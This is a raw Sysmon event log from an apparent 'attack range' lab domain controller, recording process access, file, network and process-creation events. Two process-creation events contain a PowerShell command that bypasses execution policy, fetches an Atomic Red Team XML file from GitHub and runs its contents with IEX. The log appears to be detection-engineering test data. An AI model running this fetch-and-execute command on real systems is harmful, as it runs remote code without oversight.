22:53:37.224{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.224{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.130{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AA21F83A8B6F05343952FF3F8252E82,SHA256=2DA347C073E717DD54EB2AE771EACD93B8D51D3828702F557162D935602914B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:28.564{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55123-false10.0.1.12-8000- 354300x80000000000000001695714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:28.235{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local55113- 354300x80000000000000001695713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:28.220{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local56772- 10341000x80000000000000001695814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.973{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-7072-603D-5C88-00000000AD01}8736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.973{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-7072-603D-5C88-00000000AD01}8736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001695812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:53:38.942{05ADC7E1-7072-603D-5C88-00000000AD01}8736\PSHost.132591128188622967.8736.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001695811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.926{05ADC7E1-7072-603D-5C88-00000000AD01}8736ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_wxtejoig.vvu.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.926{05ADC7E1-7072-603D-5C88-00000000AD01}8736ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_xdzbbwjr.imp.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001695809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.911{05ADC7E1-7072-603D-5C88-00000000AD01}8736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_xdzbbwjr.imp.ps12021-03-01 22:53:38.911 10341000x80000000000000001695808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.895{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-7072-603D-5C88-00000000AD01}8736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.866{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7072-603D-5C88-00000000AD01}8736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-7072-603D-5C88-00000000AD01}8736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-7072-603D-5B88-00000000AD01}73086592C:\Windows\system32\cmd.exe{05ADC7E1-7072-603D-5C88-00000000AD01}8736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.862{05ADC7E1-7072-603D-5C88-00000000AD01}8736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7072-603D-5B88-00000000AD01}7308C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX"" 10341000x80000000000000001695799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7072-603D-5B88-00000000AD01}7308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7072-603D-5B88-00000000AD01}7308C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001695797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-7072-603D-5B88-00000000AD01}7308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.848{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7072-603D-5B88-00000000AD01}7308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001695791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:38.852{05ADC7E1-7072-603D-5B88-00000000AD01}7308C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX"" 